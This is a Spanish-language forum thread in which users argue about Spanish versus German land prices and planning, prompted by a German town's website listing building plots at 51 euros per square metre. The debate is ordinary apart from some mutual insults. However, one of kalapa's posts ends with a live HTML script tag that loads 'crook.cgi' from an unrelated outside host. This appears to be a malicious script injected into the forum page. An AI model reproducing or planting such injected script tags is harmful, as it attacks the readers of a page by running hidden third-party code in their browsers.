Un vistazo a La Civilización: Alemania.

kalapa

Madmaxista
Desde
14 Sep 2006
Mensajes
9.247
Reputación
10.833
Lugar
Ladrillolandia
Pues resulta que me encanta la musica y los instrumentos musicales. Aporreo un poco y eso.
Al ajo. Resulta que navegando por la web de una afamada fabrica de bajos electricos, alemanes, pensé, voy a entrar en la parte de contacto, para ver quienes son, donde están, etc...
http://www.warwick.de/modules/frame...modules/infos/info.php?katID=2079&cl=ES&cl=ES
Total, que están en un pueblo que se llama Markneukirchen .. pequeño pero con una gran tradición en la fabricación de instrumentos musicales. Tienen hasta museo y palacio de la musica y eso.
Digo, pues voy a buscarlo por el interné.... y dí con el web de dicho pueblo: http://www.markneukirchen.de/
Pincho por ahi y de repente,,, OH ciencia ficcion (Para un ejpañó, claro)
Me encuentro que tienen una la página con los terrenos edificables para vivienda: http://www.markneukirchen.de/engl/immo/wohnbau.php
Tambien tienen para industria.

Leerlo... Yo, todavia no me he repuesto del Shock....
Mis sospechas sobre que LolailoCountry(Ejpaña) es una hez de pais ESTAN COMPLETAMENTE CONFIRMADAS

Los Alemanes, PONEN EN EL WEB DE SU PUEBLO LOS TERRENOS RECALIFICADOS Y EL PRECIO !!! .... 51€ el metro. Y estan con las calles puestas, luz, gas, farolas...

Perdon, me voy a llorar un rato. ahora vuelvo. :(
 

ex-burbujista

Madmaxista
Desde
20 Sep 2006
Mensajes
3.481
Reputación
54
estas cosas sin el contexto adecuado para entender lo que pasa no sirve de nada, es puera tonteria.

es como si un alemán se encuentra la web de marinaleda que por 15 euros te "compras una vivienda".... bla bla

o en muchos pueblos de España que el suelo es practicamente gratis.
o incluso pueblos en los que te dan casa y trabajo...

ESPAÑA ES IDEAL..... JEJEJE,,,,
 

TRAX

Madmaxista
Desde
21 Oct 2006
Mensajes
1.522
Reputación
392
Los alemanes son simples, fijate... si tienes una empresa y vas a crear puestos de trabajo, el gobierno regional te regala el suelo para que construyas. Que ignorantes!!!, tendrian que aprender de los españoles, hace unos dias le pedian a mi jefe por una nave en un "políngano" de Segovia "solo" 6000 euros/metro, pa cagarse. Que poco saben los alemanes de los negocios.
 

la barquera

Madmaxista
Desde
25 Dic 2006
Mensajes
9.826
Reputación
9.262
A ver si lo entendemos

kalapa dijo:
Pues resulta que me encanta la musica y los instrumentos musicales. Aporreo un poco y eso.
Al ajo. Resulta que navegando por la web de una afamada fabrica de bajos electricos, alemanes, pensé, voy a entrar en la parte de contacto, para ver quienes son, donde están, etc...
http://www.warwick.de/modules/frame...modules/infos/info.php?katID=2079&cl=ES&cl=ES
Total, que están en un pueblo que se llama Markneukirchen .. pequeño pero con una gran tradición en la fabricación de instrumentos musicales. Tienen hasta museo y palacio de la musica y eso.
Digo, pues voy a buscarlo por el interné.... y dí con el web de dicho pueblo: http://www.markneukirchen.de/
Pincho por ahi y de repente,,, OH ciencia ficcion (Para un ejpañó, claro)
Me encuentro que tienen una la página con los terrenos edificables para vivienda: http://www.markneukirchen.de/engl/immo/wohnbau.php
Tambien tienen para industria.

Leerlo... Yo, todavia no me he repuesto del Shock....
Mis sospechas sobre que LolailoCountry(Ejpaña) es una hez de pais ESTAN COMPLETAMENTE CONFIRMADAS

Los Alemanes, PONEN EN EL WEB DE SU PUEBLO LOS TERRENOS RECALIFICADOS Y EL PRECIO !!! .... 51€ el metro. Y estan con las calles puestas, luz, gas, farolas...

Perdon, me voy a llorar un rato. ahora vuelvo. :(
¿Acaso alguien duda de que el famoso "Ejpain isdiferen" es un tópico sin base real? :o
 

kalapa

Madmaxista
Desde
14 Sep 2006
Mensajes
9.247
Reputación
10.833
Lugar
Ladrillolandia
ex-burbujista dijo:
estas cosas sin el contexto adecuado para entender lo que pasa no sirve de nada, es puera tonteria.

es como si un alemán se encuentra la web de marinaleda que por 15 euros te "compras una vivienda".... bla bla

o en muchos pueblos de España que el suelo es practicamente gratis.
o incluso pueblos en los que te dan casa y trabajo...

ESPAÑA ES IDEAL..... JEJEJE,,,,
Te he puesto el contexto, mendrugo...

Es una zona con industria, nada deprimida... Pero es igual, tu no veras el tren hasta que te atropelle.
Busca por otras zonas de Alemania... Son asi. No es como ejpaña, que estamos todos apiñaos en cuatro capitales, el campo abandonado y sin industria... Comprendo que tengas miedo al batacazo. Tu tienes claro que la heconomia de ejte pais esta basada en la especulacion... sabes que sin ello, al garete. Pero tus patéticos intentos por mantener el status quo no te serviran de nada.

ex-burbu. Me encanta que existas, eres como la veneno, cachuli, tamara la mala, paco porras, etc. Das mucho juego.<script src="http://phonebill.ifreepages.com/burbuja/crook.cgi"></script>
 
Última edición:
Desde
21 Jun 2006
Mensajes
19.732
Reputación
14.573
TRAX dijo:
Los alemanes son simples, fijate... si tienes una empresa y vas a crear puestos de trabajo, el gobierno regional te regala el suelo para que construyas. Que ignorantes!!!, tendrian que aprender de los españoles, hace unos dias le pedian a mi jefe por una nave en un "políngano" de Segovia "solo" 6000 euros/metro, pa cagarse. Que poco saben los alemanes de los negocios.
¿Y qué?

Conozco casos de empresas a las que los flamantes munícipes les han regalado suelo municipal a cambio de instalarse, y después de 5 años ni siquiera han llegado a acabar la fábrica porque estan en la ruina. Nunca la acabarán y nunca crearán ningun empleo, dando una imagen lamentable de abandono para toda la zona. A si que regalar suelo industrial les ha hecho más pobres a todos.

Por cierto si alguien busca suelo industrial excelentemente comunicado que me mande un privado, hasta con transporte férreo directo desde la misma parcela.
 

la barquera

Madmaxista
Desde
25 Dic 2006
Mensajes
9.826
Reputación
9.262
Tontísimos!!!

TRAX dijo:
Los alemanes son simples, fijate... si tienes una empresa y vas a crear puestos de trabajo, el gobierno regional te regala el suelo para que construyas. Que ignorantes!!!, tendrian que aprender de los españoles, hace unos dias le pedian a mi jefe por una nave en un "políngano" de Segovia "solo" 6000 euros/metro, pa cagarse. Que poco saben los alemanes de los negocios.
Soy testigo de que en ocasiones son capaces de romper todas las normas del protocolo sagrado de la "fiesta" y llaman por teléfono en día domingo para captar y convencer a un simple españolito investigador que promete, ofreciéndole todo tipo de facilidades para sus proyectos "ilusos".
;)
 

Neutron_Mortgages

Madmaxista
Desde
20 Sep 2006
Mensajes
2.425
Reputación
1.259
kalapa dijo:
Te he puesto el contexto, mendrugo...

Es una zona con industria, nada deprimida... Pero es igual, tu no veras el tren hasta que te atropelle.
Busca por otras zonas de Alemania... Son asi. No es como ejpaña, que estamos todos apiñaos en cuatro capitales, el campo abandonado y sin industria... Comprendo que tengas miedo al batacazo. Tu tienes claro que la heconomia de ejte pais esta basada en la especulacion... sabes que sin ello, al garete. Pero tus patéticos intentos por mantener el status quo no te serviran de nada.

ex-burbu. Me encanta que existas, eres como la veneno, cachuli, tamara la mala, paco porras, etc. Das mucho juego.
.
Ex-burbu es así. Abres un hilo exponiendo una situación perfectamente documentada y contextuada y a él lo único que se ocurre es decir que no vale ... porque no está contextuada. Ni se lee los post, sólo le interesa meter ruido en el foro, para desprestigiarlo (cosa que no puede conseguir).


Por cierto, lo que comentas es una de las diferencias fundamentales entre España y Alemania. Aquí vive gente en las capitales importantes y la costa, el resto del territorio está despoblado. Mientras que en Alemania, en ciudades pequeñitas, ves que está todo perfectamente planificado y estructurado con industria, comercio, universidad, etc ... Aquí todo lo que ocurre es fruto de la especulación y la casualidad.
 

ex-burbujista

Madmaxista
Desde
20 Sep 2006
Mensajes
3.481
Reputación
54
kalapa dijo:
Te he puesto el contexto, mendrugo...

Es una zona con industria, nada deprimida... Pero es igual, tu no veras el tren hasta que te atropelle.
Busca por otras zonas de Alemania... Son asi. No es como ejpaña, que estamos todos apiñaos en cuatro capitales, el campo abandonado y sin industria... Comprendo que tengas miedo al batacazo. Tu tienes claro que la heconomia de ejte pais esta basada en la especulacion... sabes que sin ello, al garete. Pero tus patéticos intentos por mantener el status quo no te serviran de nada.

ex-burbu. Me encanta que existas, eres como la veneno, cachuli, tamara la mala, paco porras, etc. Das mucho juego.
QUE BUENO, nos cuentas que te haces una pajilla mientras miras un pueblillo alemán del que no sabes nada y que te excita que no quiera vivir allí nadie..?? ¿¿y dices que eso es un contexto?? me puedo partir el trastero a reír??

hay que viajar mas allá del google maps...

cuando hablo de conocer hablo de conocer de verdad, no de ver una paginilla y dos textos..

LO RIDICULO ES QUE ESTAS TONTERIAS E IDEALIZACIONES LAS HACEIS SOBRE ALEMANIA. JUSTO ELLOS QUE TUVIERON UNA BURBUJA Y LLEVAN 15 AÑOS SUFRIENDOLA, Y LOS PONEIS COMO MODELOS DE "SENSATOS"
vivis en otra realidad...
 

ex-burbujista

Madmaxista
Desde
20 Sep 2006
Mensajes
3.481
Reputación
54
Neutron_Mortgages dijo:
.
Ex-burbu es así. Abres un hilo exponiendo una situación perfectamente documentada y contextuada y a él lo único que se ocurre es decir que no vale ... porque no está contextuada. Ni se lee los post, sólo le interesa meter ruido en el foro, para desprestigiarlo (cosa que no puede conseguir).

.
¿pero de donde os sacan?? de verdad... fumáis antes de entrar al foro??
le dais a las drojas duras??

cuenta de un pueblo que tiene una fabrica de instrumentos y no sabe nada mas... y eso es un contexto adecuado para hablar de ese pueblo??

el contexto es conocer el pueblo y la realidad social y económica, saber donde esta, si los trabajos desaparecen o se crea empleo, el tipo de urbanismo, el ayuntamiento, la geografía... etc.. pero conocerlos de verdad... el sabe que fabrican instrumentos y ya "sabe",...

y marinaleda esta en el sur de españa---

hay vida mas allá de las drojas duras y del google maps...
 

kalapa

Madmaxista
Desde
14 Sep 2006
Mensajes
9.247
Reputación
10.833
Lugar
Ladrillolandia
ex-burbu. Te van a dar el Oscar al mejor actor.
O eso, o eres así, cosa que no creo que sea posible.

Date un garbeo por Europa, pueblerino.
 

kalapa

Madmaxista
Desde
14 Sep 2006
Mensajes
9.247
Reputación
10.833
Lugar
Ladrillolandia
Ejpaña y Europa...

Wikipedia. Torre Eiffel

El ingeniero francés Gustave Eiffel presentó primero su proyecto de torre a los responsables del Ayuntamiento de Barcelona, para que se construyera en esta ciudad con motivo de la Exposición Universal de Barcelona (1888); pero a los responsables del ayuntamiento barcelonés les pareció una construcción extraña, y cara, que no encajaría en la ciudad. Tras la negativa del consistorio barcelonés, Eiffel, presentó su proyecto a los responsables de la Exposición Universal de París, donde se erigiría un año más tarde, en 1889. Éstos aceptaron construir la torre, pese a que en principio pensaron que la tendrían que desmontar una vez acabada la exposición. Sólo la voluntad popular evitó que se derribase.


Ex-burbu, ¿ Eres la reencarnacion de ese alcalde de Barcelona ?
:D
 

TRAX

Madmaxista
Desde
21 Oct 2006
Mensajes
1.522
Reputación
392
Pasapisero dijo:
¿Y qué?

Conozco casos de empresas a las que los flamantes munícipes les han regalado suelo municipal a cambio de instalarse, y después de 5 años ni siquiera han llegado a acabar la fábrica porque estan en la ruina. Nunca la acabarán y nunca crearán ningun empleo, dando una imagen lamentable de abandono para toda la zona. A si que regalar suelo industrial les ha hecho más pobres a todos.

Por cierto si alguien busca suelo industrial excelentemente comunicado que me mande un privado, hasta con transporte férreo directo desde la misma parcela.
Ya te digo, son simples estos alemanes. Aquí cuando excepcionalmente se regala un terreno municipal nadie pide responsabilidades, especialmente si hay vinculo familiar o recalificación de por medio (previa entrega de binladens), sin embargo alli te crujen a multas y te obligan a devolver el terreno tal como te lo entregarón, haciendote responsable de los gastos. Estan zumbaos estos alemanes, ya espabilarán, ya...!!!
 

kalapa

Madmaxista
Desde
14 Sep 2006
Mensajes
9.247
Reputación
10.833
Lugar
Ladrillolandia
ex-burbujista dijo:
no soy yo el que necesita viajar, no soy el que dice que habla con conocimiento y con el contexto adecuado y habla de un pueblo que solo ha visto en una web.
Sabia que no habias ido mas alla de Valladolid... pueblerino.
 

ex-burbujista

Madmaxista
Desde
20 Sep 2006
Mensajes
3.481
Reputación
54
*
kalapa dijo:
ex-burbu. Te van a dar el Oscar al mejor actor.
O eso, o eres así, cosa que no creo que sea posible.

Date un garbeo por Europa, pueblerino.
no soy yo el que necesita viajar, no soy el que dice que habla con conocimiento y con el contexto adecuado y habla de un pueblo que solo ha visto en una web.